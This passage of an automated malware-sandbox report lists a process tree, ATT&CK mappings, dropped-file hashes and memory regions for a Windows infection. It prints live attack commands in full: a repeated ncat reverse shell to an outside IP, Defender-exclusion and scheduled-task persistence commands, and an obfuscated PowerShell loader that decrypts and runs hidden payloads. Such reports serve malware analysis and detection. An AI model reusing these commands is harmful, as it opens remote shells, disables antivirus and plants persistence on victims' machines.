C:\Users\Admin\AppData\Local\Temp\ncat.exeC:\Users\Admin\AppData\Local\Temp\ncat.exe 147.185.221.20 45895 -e powershell9⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell10⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\ncat.exeC:\Users\Admin\AppData\Local\Temp\ncat.exe 147.185.221.20 45895 -e powershell9⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell10⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\ncat.exeC:\Users\Admin\AppData\Local\Temp\ncat.exe 147.185.221.20 45895 -e powershell9⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell10⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\ncat.exeC:\Users\Admin\AppData\Local\Temp\ncat.exe 147.185.221.20 45895 -e powershell9⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell10⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\ncat.exeC:\Users\Admin\AppData\Local\Temp\ncat.exe 147.185.221.20 45895 -e powershell9⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell10⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\ncat.exeC:\Users\Admin\AppData\Local\Temp\ncat.exe 147.185.221.20 45895 -e powershell9⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell10⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\ncat.exeC:\Users\Admin\AppData\Local\Temp\ncat.exe 147.185.221.20 45895 -e powershell9⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell10⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\ncat.exeC:\Users\Admin\AppData\Local\Temp\ncat.exe 147.185.221.20 45895 -e powershell9⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell10⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\ncat.exeC:\Users\Admin\AppData\Local\Temp\ncat.exe 147.185.221.20 45895 -e powershell9⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell10⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\ncat.exeC:\Users\Admin\AppData\Local\Temp\ncat.exe 147.185.221.20 45895 -e powershell9⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell10⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\ncat.exeC:\Users\Admin\AppData\Local\Temp\ncat.exe 147.185.221.20 45895 -e powershell9⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell10⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\ncat.exeC:\Users\Admin\AppData\Local\Temp\ncat.exe 147.185.221.20 45895 -e powershell9⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell10⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\ncat.exeC:\Users\Admin\AppData\Local\Temp\ncat.exe 147.185.221.20 45895 -e powershell9⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell10⤵
-
C:\Users\Admin\AppData\Local\Temp\conhost.exe"C:\Users\Admin\AppData\Local\Temp\conhost.exe"7⤵
- Executes dropped EXE
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qyndhi.bat" "7⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IjJvKUiZ3qVbekS9RBld+s/2H9KCxAMxfp72UAdOekw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RSqfgbsxY4tQviMhgruGlA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $mTJVo=New-Object System.IO.MemoryStream(,$param_var); $OVEZJ=New-Object System.IO.MemoryStream; $xpowC=New-Object System.IO.Compression.GZipStream($mTJVo, [IO.Compression.CompressionMode]::Decompress); $xpowC.CopyTo($OVEZJ); $xpowC.Dispose(); $mTJVo.Dispose(); $OVEZJ.Dispose(); $OVEZJ.ToArray();}function execute_function($param_var,$param2_var){ $aXdmE=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $plyTG=$aXdmE.EntryPoint; $plyTG.Invoke($null, $param2_var);}$DUACE = 'C:\Users\Admin\AppData\Local\Temp\qyndhi.bat';$host.UI.RawUI.WindowTitle = $DUACE;$NSEOn=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($DUACE).Split([Environment]::NewLine);foreach ($fxoWu in $NSEOn) { if ($fxoWu.StartsWith('WopmnYnvzYwvYHEKXXam')) { $rQXdu=$fxoWu.Substring(20); break; }}$payloads_var=[string[]]$rQXdu.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "8⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'9⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'9⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\powershell.exe'9⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "powershell" /tr "C:\Users\Admin\AppData\Roaming\powershell.exe"9⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheFilesize
53KB
MD5a26df49623eff12a70a93f649776dab7
SHA1efb53bd0df3ac34bd119adf8788127ad57e53803
SHA2564ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245
SHA512e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-InteractiveFilesize
2KB
MD5005bc2ef5a9d890fb2297be6a36f01c2
SHA10c52adee1316c54b0bfdc510c0963196e7ebb430
SHA256342544f99b409fd415b305cb8c2212c3e1d95efc25e78f6bf8194e866ac45b5d
SHA512f8aadbd743495d24d9476a5bb12c8f93ffb7b3cc8a8c8ecb49fd50411330c676c007da6a3d62258d5f13dd5dacc91b28c5577f7fbf53c090b52e802f5cc4ea22
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5fefc3c2e8b3bc905d96dc7ce2d0eaad3
SHA1debd9cb93c1801c881ae20ffe67d65d12e1cf8c3
SHA256b59a972429f6f91b9a3c3f3951101d6675543d2932ba1fe1e463dc8799486002
SHA51296ded891c94bff4a24771dfa8d2ea17c2fee73e580f35f43c93e68a5ef8665ef3ce26441652c5253c21bd18a144d8b313dcd5679ee879031703b3a609d6c35c3
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD5e243a38635ff9a06c87c2a61a2200656
SHA1ecd95ed5bf1a9fbe96a8448fc2814a0210fa2afc
SHA256af5782703f3f2d5a29fb313dae6680a64134db26064d4a321a3f23b75f6ca00f
SHA5124418957a1b10eee44cf270c81816ae707352411c4f5ac14b6b61ab537c91480e24e0a0a2c276a6291081b4984c123cf673a45dcedb0ceeef682054ba0fc19cb4
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD5eb1ad317bd25b55b2bbdce8a28a74a94
SHA198a3978be4d10d62e7411946474579ee5bdc5ea6
SHA2569e94e7c9ac6134ee30e79498558aa1a5a1ac79a643666c3f8922eed215dd3a98
SHA512d011f266c0240d84470c0f9577cd9e4927309bd19bb38570ca9704ed8e1d159f9bea982a59d3eefef72ce7a10bd81208b82e88ef57c7af587f7437a89769adc0
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD508f9f3eb63ff567d1ee2a25e9bbf18f0
SHA16bf06056d1bb14c183490caf950e29ac9d73643a
SHA25682147660dc8d3259f87906470e055ae572c1681201f74989b08789298511e5f0
SHA512425a4a8babbc11664d9bac3232b42c45ce8430b3f0b2ae3d9c8e12ad665cd4b4cbae98280084ee77cf463b852309d02ca43e5742a46c842c6b00431fc047d512
-
C:\Users\Admin\AppData\Local\Temp\$TMP~.batFilesize
135B
MD56bf11eb7e2ca37624f85d163b2a3f866
SHA100a65cddc32344d3b15b6bca4315ff692524494b
SHA256c4c7558e442c5f915fd6caf1290610ca2423dafca97ae05b1eac715f4267197b
SHA51279c8ba8ad545244c9c3765f32f291ffe918d8af1bcf7b3d375fdfee70e39ae4a548e25425ac3f2252276777a784a2ba5fd64f833b7776a413d4cabc3932272e0
-
C:\Users\Admin\AppData\Local\Temp\7zip.exeFilesize
65KB
MD5aa4404671315c6f141a264b628d05052
SHA15e1b52fd1b3ce93f82c35b8e07c08774003dd422
SHA256d09701eb2589607f7827408b297ce94f8f3f9afcbc77a8f098cac2df6ccb8d18
SHA5125a8e8398e126d760f5486de6fae139f3e597f26da2eccc89234c32131c352259a4b8cd19596ab58dd45ca66356f89290cbdb74d7e8b7daee1af73204fda08eca
-
C:\Users\Admin\AppData\Local\Temp\WinRunner.exeFilesize
10.2MB
MD54758850f5686ee8da4e930c97d6caca2
SHA1190f3d1b98411cc586546780a59d7c5730ab3d64
SHA256cdd06b27fd62b93abf2eadf7ad388fca617951a834c612862a5ee3c0c2cd72a3
SHA512c764ebd03544b5073577e2d5f84d8134d119b78a41179f24092cd9051f6396fcff639131c3e27617e0f40030f1af0d9e02a3f7d62e2987edbc4c9e26bbd3a1af
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_aba34oxz.1ra.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\conhost.exeFilesize
63KB
MD5c8be6e344fd58475e1cfe3bf12e69380
SHA1da41de66884faeccc83283accc0d23a722915774
SHA256ccd4b5bf3a42a5006ced7f25a17765b778c17c6bb28a488dd466d493709cdec0
SHA51246639ab300a492f1d7783a27a349674a22b112b26a77e5ee7c3f910b88f2fa4f8e581b72e3e4632b4bdf7a04d63d1e3153a8989b2974bc4bdca985576c71cea8
-
C:\Users\Admin\AppData\Local\Temp\libcrypto-3.dllFilesize
3.9MB
MD527c8a62563e3f34f3466d3cbf4b8fe74
SHA123a2585b4afa8e77d365fb1bcf8c96d7273b9742
SHA2563927d87e03ad83e22a40fdcb680707a28eb04314af51f228130d8396dabb3de4
SHA512c24f2725a05b209895e4de7b548fc7782d5695bcadc6b79a742c9860efa4691f4cb0b997bb1035b379c64de9d5476e6425e1e76e0b6d73faee635e7fc87207d1
-
C:\Users\Admin\AppData\Local\Temp\libssl-3.dllFilesize
661KB
MD524f02f8bd55813c87a4952e60e87edf1
SHA1c19834e2d64dd44d84d58c73d88b454fd6ccb385
SHA25670b3b431d10ca9dea42b5b5aca85a97c39c91e0e2e3b5763514c1608a5f980b3
SHA51204922a3a80d551cfada9fcb765966eeca0741bfff3469a551d538580b64a70d8f1a6a94abada3762a79cd6fd2222eb38c9e491a74fc19937bbd8ab309770f7ad
-
C:\Users\Admin\AppData\Local\Temp\libuac.dll.batFilesize
5.9MB
MD501132c50b0d844fab3b44bdb50be7445
SHA1c1212c8576c7794a2bbcf86f6a5bbd212fa23994
SHA256874cd778f30a84b531ed0811536dd64fdf3259db9509116f3eb3414127a4e0bf
SHA51296be33e08ca7a4b7331f96488182d999d94a57923d70d6af0acda64795e3c4fc5cab55b16661af48832b63ea38bf39a40dfe636f479709e0d4afb723ac3d9c31
-
C:\Users\Admin\AppData\Local\Temp\ncat.exeFilesize
355KB
MD54f6b1c5a41f7e9d183a7dd3ace65812e
SHA1c08a5e5c59f39522939284ee8743ff55967da76a
SHA256a3071223a56a18c9fb913696487f69d1ea2633176412446d4b7eecc82d33c262
SHA51225c7a3f16b001144cc8fdc5c9014cdfe33352bd76c116c3e1b7e3238668ae0b284fc641b96aee92d07dc9a25fa9b016e441db96c07f2426e09b0ec9b8d2443cf
-
C:\Users\Admin\AppData\Local\Temp\wininit.exeFilesize
409KB
MD5ba300d38cfdf1c73eddcd7a1ac589b78
SHA1c8741781f775f51dbf559ae783adcd762b036946
SHA256e35f07e7fab453e5366f8f220d8302f31dc134aebc71fedc6beb113c9706961f
SHA51219274f0742d4e82c3f184ec264bb8f9d4fd3c7092b51ec63b727c3ab33ef70cd36805f1f7c52c663ff72496c79b827c23bfc547031f60e62dba396bdaaa50047
-
C:\Users\Admin\AppData\Roaming\Windows_Log_249.vbsFilesize
115B
MD56f8d66bf74c28786cb983fe4bb15a09d
SHA1b814ac7d5474eaa37a1e960bd58c439b74680225
SHA2565b3d9383ab911ca76a6bffa6a6cba314171b02bfa0b87a415fec7fec970b4ed6
SHA512bbd6765cf4750ee9eb5ee35c2cb4e6892aff0f7c5542ca33d839f488f22139c8bb431ce4c28ad323312977d64559a1c02a27f0b1e33f1cb0a1f9d7e50ff574e2
-
C:\Users\Admin\AppData\Roaming\powershell.exeFilesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
memory/396-151-0x00000000061D0000-0x0000000006214000-memory.dmpFilesize
272KB
-
memory/396-149-0x0000000005C80000-0x0000000005C9E000-memory.dmpFilesize
120KB
-
memory/396-138-0x0000000005700000-0x0000000005766000-memory.dmpFilesize
408KB
-
memory/396-136-0x0000000004DC0000-0x0000000004DE2000-memory.dmpFilesize
136KB
-
memory/396-135-0x0000000004E30000-0x0000000005458000-memory.dmpFilesize
6.2MB
-
memory/396-176-0x0000000007690000-0x0000000007D0A000-memory.dmpFilesize
6.5MB
-
memory/396-134-0x00000000047A0000-0x00000000047D6000-memory.dmpFilesize
216KB
-
memory/396-177-0x0000000007030000-0x000000000704A000-memory.dmpFilesize
104KB
-
memory/396-150-0x0000000005CD0000-0x0000000005D1C000-memory.dmpFilesize
304KB
-
memory/396-137-0x0000000005690000-0x00000000056F6000-memory.dmpFilesize
408KB
-
memory/396-148-0x0000000005770000-0x0000000005AC4000-memory.dmpFilesize
3.3MB
-
memory/396-154-0x0000000006F90000-0x0000000007006000-memory.dmpFilesize
472KB
-
memory/816-500-0x000001CA1F250000-0x000001CA1F26C000-memory.dmpFilesize
112KB
-
memory/816-501-0x000001CA1F240000-0x000001CA1F24A000-memory.dmpFilesize
40KB
-
memory/816-502-0x000001CA1F3B0000-0x000001CA1F3B8000-memory.dmpFilesize
32KB
-
memory/816-503-0x000001CA1F3C0000-0x000001CA1F3CA000-memory.dmpFilesize
40KB
-
memory/856-289-0x0000000006230000-0x0000000006584000-memory.dmpFilesize
3.3MB
-
memory/960-438-0x00007FFBD5A90000-0x00007FFBD5AA0000-memory.dmpFilesize
64KB
-
memory/1036-448-0x00007FFBD5A90000-0x00007FFBD5AA0000-memory.dmpFilesize
64KB
-
memory/1124-437-0x00007FFBD5A90000-0x00007FFBD5AA0000-memory.dmpFilesize
64KB
-
memory/1248-249-0x0000000005EF0000-0x0000000006244000-memory.dmpFilesize
3.3MB
-
memory/1352-443-0x00007FFBD5A90000-0x00007FFBD5AA0000-memory.dmpFilesize
64KB
-
memory/1520-445-0x00007FFBD5A90000-0x00007FFBD5AA0000-memory.dmpFilesize
64KB
-
memory/1588-110-0x0000000000180000-0x0000000000196000-memory.dmpFilesize
88KB
-
memory/1740-441-0x00007FFBD5A90000-0x00007FFBD5AA0000-memory.dmpFilesize
64KB
-
memory/1912-444-0x00007FFBD5A90000-0x00007FFBD5AA0000-memory.dmpFilesize
64KB
-
memory/2080-447-0x00007FFBD5A90000-0x00007FFBD5AA0000-memory.dmpFilesize
64KB
-
memory/2116-436-0x00007FFBD5A90000-0x00007FFBD5AA0000-memory.dmpFilesize
64KB
-
memory/2156-442-0x00007FFBD5A90000-0x00007FFBD5AA0000-memory.dmpFilesize
64KB
-
memory/2196-449-0x00007FFBD5A90000-0x00007FFBD5AA0000-memory.dmpFilesize
64KB
-
memory/2216-440-0x00007FFBD5A90000-0x00007FFBD5AA0000-memory.dmpFilesize
64KB
-
memory/2500-439-0x00007FFBD5A90000-0x00007FFBD5AA0000-memory.dmpFilesize
64KB
-
memory/2516-117-0x000001A1DBF20000-0x000001A1DC94C000-memory.dmpFilesize
10.2MB
-
memory/2556-11-0x00007FFBF7790000-0x00007FFBF8251000-memory.dmpFilesize
10.8MB
-
memory/2556-12-0x00007FFBF7790000-0x00007FFBF8251000-memory.dmpFilesize
10.8MB
-
memory/2556-16-0x00007FFBF7790000-0x00007FFBF8251000-memory.dmpFilesize
10.8MB
-
memory/2556-0-0x00007FFBF7793000-0x00007FFBF7795000-memory.dmpFilesize
8KB
-
memory/2556-10-0x000001E57EA70000-0x000001E57EA92000-memory.dmpFilesize
136KB
-
memory/2652-234-0x000000001C980000-0x000000001C98E000-memory.dmpFilesize
56KB
-
memory/2652-111-0x0000000000E90000-0x0000000000EA6000-memory.dmpFilesize
88KB
-
memory/2724-435-0x00007FFBD5A90000-0x00007FFBD5AA0000-memory.dmpFilesize
64KB
-
memory/2796-72-0x000002B3CDD80000-0x000002B3CDD9A000-memory.dmpFilesize
104KB
-
memory/2796-371-0x000002B3AB1B0000-0x000002B3AB1BC000-memory.dmpFilesize
48KB
-
memory/3224-121-0x00000000058B0000-0x0000000005942000-memory.dmpFilesize
584KB
-
memory/3224-153-0x0000000006AC0000-0x0000000006AFC000-memory.dmpFilesize
240KB
-
memory/3224-112-0x0000000000F40000-0x0000000000FAC000-memory.dmpFilesize
432KB
-
memory/3224-152-0x0000000006580000-0x0000000006592000-memory.dmpFilesize
72KB
-
memory/3224-179-0x00000000070A0000-0x00000000070AA000-memory.dmpFilesize
40KB
-
memory/3224-113-0x0000000005E60000-0x0000000006404000-memory.dmpFilesize
5.6MB
-
memory/3468-386-0x0000000003340000-0x000000000336A000-memory.dmpFilesize
168KB
-
memory/3468-434-0x00007FFBD5A90000-0x00007FFBD5AA0000-memory.dmpFilesize
64KB
-
memory/4424-219-0x0000000006AD0000-0x0000000006B1C000-memory.dmpFilesize
304KB
-
memory/4424-214-0x0000000006070000-0x00000000063C4000-memory.dmpFilesize
3.3MB
-
memory/4476-383-0x000001EBA93B0000-0x000001EBA93B8000-memory.dmpFilesize
32KB
-
memory/4476-384-0x000001EBA97B0000-0x000001EBA97FC000-memory.dmpFilesize
304KB
-
memory/4476-385-0x000001EBA93C0000-0x000001EBA93D6000-memory.dmpFilesize
88KB
-
memory/4860-446-0x00007FFBD5A90000-0x00007FFBD5AA0000-memory.dmpFilesize
64KB
-
memory/5020-24-0x00007FFBF7790000-0x00007FFBF8251000-memory.dmpFilesize
10.8MB
-
memory/5020-32-0x0000014967A10000-0x0000014967A86000-memory.dmpFilesize
472KB
-
memory/5020-29-0x00007FFBF7790000-0x00007FFBF8251000-memory.dmpFilesize
10.8MB
-
memory/5020-31-0x0000014967940000-0x0000014967984000-memory.dmpFilesize
272KB
-
memory/5020-30-0x00007FFBF7790000-0x00007FFBF8251000-memory.dmpFilesize
10.8MB
-
memory/5020-33-0x000001494CF60000-0x000001494CF68000-memory.dmpFilesize
32KB
-
memory/5020-34-0x0000014977DB0000-0x0000014978884000-memory.dmpFilesize
10.8MB
-
memory/5020-63-0x00007FFBF7790000-0x00007FFBF8251000-memory.dmpFilesize
10.8MB